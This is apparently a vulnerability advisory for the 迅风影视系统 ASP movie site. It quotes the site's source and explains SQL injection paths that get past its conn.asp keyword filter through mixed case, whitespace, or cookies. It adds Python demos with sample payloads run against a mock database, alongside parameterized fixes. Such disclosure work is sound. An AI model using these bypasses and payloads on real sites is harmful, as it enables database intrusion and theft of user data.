Affected version: 迅风影视系统 (Xunfeng movie system)
Official website:

Vulnerability type: SQL injection
Description: 迅风影视系统 contains multiple SQL injection vulnerabilities.


#1. Injection at registration:

wwwroot/reg/reg.asp

(The author's note on this file: conn.asp is included, but its filter can still be bypassed; see #2.)

<% szPath = "../../" %>
<!--#include file="../conn.asp" -->
<!--#include file = "md5.asp"-->
<%
' Single quotes inside the SQL and JScript strings were lost in this page's copy of the
' listing and are restored here; the logic is otherwise as published.
if Request.Form("submit") <> "" then
    szUserName   = Request.Form("UserName")
    szPassWord   = Request.Form("UserPass")
    szEmail      = Request.Form("UserMail")
    szMemo       = Request.Form("UserMemo")
    iPayMode     = Request.Form("PayMode")
    szPBQuestion = Request.Form("PBQuestion")
    szPBAnswer   = Request.Form("PBAnswer")
    szGetCode    = Trim(Request.Form("codestr"))

    ' Existence check: user input concatenated straight into the WHERE clause.
    szSQL = "SELECT * FROM MOVIE_Users WHERE UserName='" & szUserName & "' OR UserEmail='" & szEmail & "'"
    set rsData_User = Server.CreateObject("ADODB.Recordset")
    rsData_User.Open szSQL, conn, 1, 3
    if not rsData_User.EOF then
        Response.Write "<script language=JScript>alert('The user name or e-mail address you registered already exists!');history.back();</script>"
        Response.End
    else
        iAccount = 0
        if Session("Option_RegMode") = 1 then iAccount = 10
        ' The verification code is only checked after the SELECT above has already run.
        If IsEmpty(Session("VerifyCode")) Or szGetCode <> CStr(Session("VerifyCode")) Then
            Response.Write "<script language=JScript>alert('Verification code does not match!');document.URL=document.referrer;</script>"
            Response.End
        end if
        if Left(szUserName, 1) = "!" then
            Response.Write "<script language=JScript>alert('Please do not use illegal characters to register a user!');history.back();</script>"
            Response.End
        end if
        ' INSERT: the same form fields concatenated again, with no escaping.
        szSQL = "INSERT INTO MOVIE_Users(UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus) "
        szSQL = szSQL & "VALUES('" & szUserName & "','" & MD5(szPassWord) & "','" & now & "','" & date+30 & "','" & szEmail & "','" & szMemo & "'," & iPayMode & ",'" & szPBQuestion & "','" & szPBAnswer & "',1)"
        conn.Execute szSQL
        Response.Write "<script language=JScript>alert('Congratulations - " & szUserName & " - you have registered successfully!');window.navigate('../index.asp');</script>"
        Response.End
    end if
    rsData_User.Close
end if
%>

Of the columns named in the INSERT (UserName, UserPass, UserRegisterTime, MovieEdate, UserEmail, UserInfo, MovieUserType, UserSign, UserBio, UserAccountStatus), the ones that come from the form (UserName, UserEmail, UserInfo, MovieUserType, UserSign, UserBio; UserPass is MD5(szPassWord) before concatenation) pass through nothing but the feeble anti-injection check in conn.asp and are then concatenated straight into the SELECT existence check and into the INSERT into MOVIE_Users. The only other validation is the Left(szUserName, 1) = "!" test. Note the order as well: the SELECT runs before the verification code is compared, so no valid code is needed to reach it. The anti-injection filter is to blame for all of it.
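As an added example (not code from 迅风影视系统 or from the author), here is a Python/SQLite model of the existence check that reg.asp builds from the UserName and UserMail fields, with the conn.asp keyword list as reproduced on this page (it contains no quote character) and a bound-parameter version beside it. The MOVIE_Users table, its rows and the sample input are constructed for the demo; register_check_safe is a hypothetical fix, not the project's.

```python
import sqlite3

# Keyword list from conn.asp as reproduced on this page. Split() on the leading "|" would
# also yield an empty first element; it is dropped here because an empty needle matches
# every value (VBScript InStr returns 1 for an empty string2), which would block everything.
SQL_INJ = ["exec ", "delete ", "insert ", " update ", "select "]


def conn_asp_form_filter_blocks(value: str) -> bool:
    """True if the Request.Form loop in conn.asp would abort on this POST value.
    InStr with no compare argument is a case-sensitive substring match."""
    return any(keyword in value for keyword in SQL_INJ)


def existence_check_sql(username: str, email: str) -> str:
    """The SELECT reg.asp concatenates from the UserName and UserMail form fields."""
    return ("SELECT * FROM MOVIE_Users WHERE UserName='" + username
            + "' OR UserEmail='" + email + "'")


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for MOVIE_Users (only the columns needed here)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE MOVIE_Users (UserName TEXT, UserEmail TEXT)")
    db.executemany("INSERT INTO MOVIE_Users VALUES (?, ?)",
                   [("admin", "admin@example.com"), ("alice", "alice@example.com")])
    return db


def register_check_vulnerable(username: str, email: str):
    """reg.asp's path: conn.asp filter first, then the concatenated SELECT.
    Returns 'blocked', or the rows the existence check matched (non-empty means
    the 'already exists' branch is taken)."""
    if conn_asp_form_filter_blocks(username) or conn_asp_form_filter_blocks(email):
        return "blocked"
    return make_db().execute(existence_check_sql(username, email)).fetchall()


def register_check_safe(username: str, email: str):
    """Hypothetical hardened check: same query with bound parameters, no keyword list."""
    return make_db().execute(
        "SELECT * FROM MOVIE_Users WHERE UserName=? OR UserEmail=?",
        (username, email)).fetchall()


if __name__ == "__main__":
    payload = "' OR '1'='1"   # constructed input; contains none of the filtered keywords
    print(existence_check_sql("bob", payload))
    print(register_check_vulnerable("bob", payload))   # every row matches
    print(register_check_safe("bob", payload))         # [] : no such user or e-mail
    print(register_check_vulnerable("bob", "x' union select 1,2--"))  # lowercase keyword: blocked
```

The WHERE clause is whatever the UserMail field says it is; with bound parameters the same input is just an e-mail address that matches nothing.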
wwwroot/Conn.asp

<%
Response.AddHeader "Content-Type", "text/html; charset=GB2312"
Response.Buffer = True
Server.ScriptTimeOut = 9999999

' anti-injection
if nochecksqlin <> 1 then
    dim sql_injdata, SQL_inj, SQL_Get
    SQL_injdata = "|exec |delete |insert | update |select "
    SQL_inj = split(SQL_injdata, "|")

    If Request.QueryString <> "" Then
        For Each SQL_Get In Request.QueryString
            For SQL_Data = 0 To Ubound(SQL_inj)
                if instr(Request.QueryString(SQL_Get), SQL_inj(SQL_Data)) > 0 Then
                    Response.Write "<Script Language=javascript>alert('Please do not try to inject by putting illegal characters in parameters!');history.back(-1)</Script>"
                    Response.end
                end if
            next
        Next
    End If

    If Request.Form <> "" Then
        For Each Sql_Post In Request.Form
            For SQL_Data = 0 To Ubound(SQL_inj)
                if instr(Request.Form(Sql_Post), SQL_inj(SQL_Data)) > 0 Then
                    Response.Write "<Script Language=javascript>alert('Please do not try to inject by putting illegal characters in parameters!');history.back(-1)</Script>"
                    Response.end
                end if
            next
        next
    end if
end if
%>

Everything here hinges on nochecksqlin: a page that sets it to 1 before including conn.asp gets no filtering at all, and the loops only ever look at Request.QueryString and Request.Form.
#2.1 GET and POST are filtered; cookies are not

Exploitable at wwwroot/FZPLAYER.ASP:

<!--#include file="conn.asp"-->
<%
Progid = Request("progid")
Set Rs = CreateObject("Adodb.RecordSet")
Rs.Open "Select * From Movie_FileList Where FileListID=" & Progid, Conn, 1, 1
Response.Write "<?xml version='1.0' encoding='GB2312' ?><webplayer>" & _
    "<Param ServerMode='2'></Param><Param UserName='unknow'></Param><Param UserID='1'></Param>" & _
    "<Param PlayMode='1'></Param><Param PlayModeValue='" & Progid & "'></Param>" & _
    "<Param ChannelID='" & Progid & "'></Param><Param ServerHost='" & Rs("FileMd5") & "'></Param>" & _
    "<Param Session='1'></Param><Param ProtocolType='1'></Param><Param EmbedMode='1'></Param>" & _
    "<Param ProgName='1'></Param><Param PlayInExe='1'></Param></webplayer>"
Rs.Close
%>

Request("progid") with no collection named searches QueryString, then Form, then Cookies, so a progid carried in a cookie reaches the query untouched: conn.asp scans only Request.QueryString and Request.Form. FileListID is numeric, so the value is concatenated without quotes, and the FileMd5 column of whatever the query returns is echoed back in the ServerHost parameter.

#2.2
SQL_injdata = "|exec |delete |insert | update |select "
SQL_inj = split(SQL_Injdata,"|")

Having so few keywords is one thing; the main problem is that case was never considered. InStr with no compare argument does a binary (case-sensitive) comparison, so Exec, Select and the like stroll straight past the filter. Go inject in broad daylight, hackers.

Two further things about this list. Every keyword carries a trailing space (and " update " a leading one), so the literal match also fails when the keyword is followed by a tab, a newline, a comment or a parenthesis. And as reproduced here the string starts with "|", so Split leaves an empty string in SQL_inj(0); InStr returns 1 for an empty search string, which would reject every non-empty parameter. Single quotes were stripped throughout this page's listing, so presumably the first slot held a single quote that the copy lost; treat the list above as incomplete.
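Added example, again not the project's code: a Python model of the conn.asp filter and of how Request("progid") resolves in FZPLAYER.ASP, run against a constructed Movie_FileList table in SQLite. It shows the three ways past the filter described in #2.1 and #2.2: a progid sent as a cookie, a mixed-case keyword, and a keyword followed by something other than a space. request_item, fzplayer and fzplayer_safe are names chosen here; fzplayer_safe is a hypothetical hardened handler.

```python
import sqlite3

# Keyword list from conn.asp as reproduced on this page (the empty first element that
# Split() produces from the leading "|" is dropped; see the note on InStr above).
SQL_INJ = ["exec ", "delete ", "insert ", " update ", "select "]


def conn_asp_filter_blocks(query: dict, form: dict) -> bool:
    """conn.asp's check: scan QueryString and Form values for the keywords with a
    case-sensitive substring match. Nothing else (cookies included) is looked at."""
    for collection in (query, form):
        for value in collection.values():
            if any(keyword in value for keyword in SQL_INJ):
                return True
    return False


def request_item(name: str, query: dict, form: dict, cookies: dict) -> str:
    """Classic ASP Request(name) with no collection named searches QueryString, Form,
    Cookies, ClientCertificate and ServerVariables in that order; the first three are
    modelled here."""
    for collection in (query, form, cookies):
        if name in collection:
            return collection[name]
    return ""


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for Movie_FileList with the two columns the page shows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Movie_FileList (FileListID INTEGER, FileMd5 TEXT)")
    db.executemany("INSERT INTO Movie_FileList VALUES (?, ?)",
                   [(1, "md5-of-file-1"), (2, "md5-of-file-2")])
    return db


def fzplayer(query: dict, form: dict, cookies: dict):
    """FZPLAYER.ASP as written: include conn.asp (the filter), read Request("progid"),
    concatenate it into a numeric comparison. Returns 'blocked' or the rows fetched."""
    if conn_asp_filter_blocks(query, form):
        return "blocked"
    progid = request_item("progid", query, form, cookies)
    return make_db().execute(
        "Select * From Movie_FileList Where FileListID=" + progid).fetchall()


def fzplayer_safe(query: dict, form: dict, cookies: dict):
    """Hypothetical hardened handler: read only the intended collection, require an
    integer, bind it. No keyword list needed."""
    progid = query.get("progid", "")
    if not progid.isdigit():
        raise ValueError("progid must be a non-negative integer")
    return make_db().execute(
        "Select * From Movie_FileList Where FileListID=?", (int(progid),)).fetchall()


if __name__ == "__main__":
    inj = "0 union select 1,2"   # constructed; lowercase "select " is on the list
    print(fzplayer({"progid": "2"}, {}, {}))                 # normal request
    print(fzplayer({"progid": inj}, {}, {}))                 # GET: blocked
    print(fzplayer({"progid": "0 union Select 1,2"}, {}, {}))  # mixed case: passes
    print(fzplayer({"progid": "0 union select\t1,2"}, {}, {}))  # tab after keyword: passes
    print(fzplayer({}, {}, {"progid": inj}))                 # cookie: never scanned, passes
```

The filter is a string comparison on two of the five collections Request() reads from; the fix is to stop reading untyped input into the query at all, not to lengthen the list.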